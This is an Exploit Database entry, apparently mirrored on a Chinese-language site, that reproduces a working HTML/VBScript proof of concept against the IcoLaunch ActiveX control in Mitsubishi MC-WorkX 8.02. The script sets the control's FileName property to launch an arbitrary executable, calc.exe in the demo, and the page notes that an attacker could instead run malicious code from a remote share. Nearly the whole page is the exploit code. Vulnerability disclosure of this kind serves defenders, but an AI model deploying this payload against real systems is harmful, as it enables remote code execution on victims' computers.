Mitsubishi MC-WorkX 8.02 – ActiveX Control ‘IcoLaunch’ File Execution

• Exploit Database
• 118 阅读

• 作者： blake
  日期： 2013-09-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/28284/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

  <html> <object classid=&apos;clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D&apos; id=&apos;target&apos;></object> <!-- Mitsubishi MC-WorkX Suite Insecure ActiveX Control - IcoLaunch.dll Vendor: http://www.meau.com Version: MC-WorkX 8.02 Tested on: Windows XP SP3 / IE 6 Download: http://www.meau.com/functions/dms/getfile.asp?ID=035000000000000001000000908800000 Author: Blake   CLSID: C28A127E-4A85-11D3-A5FF-00A0249E352D ProgId: ICOLAUNCHLib.LaunchCtl Path: C:\Program Files\Mitsubishi Electric Automation\MC-WorX\Bin\IcoLaunch.dll MemberName: FileName Safe for scripting: True Safe for init: True Kill Bit: False -->   <title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title> <p>This proof of concept will launch an arbritrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</p>   <script language=&apos;vbscript&apos;> file="C:\\WINDOWS\\system32\\calc.exe" target.FileName = file </script>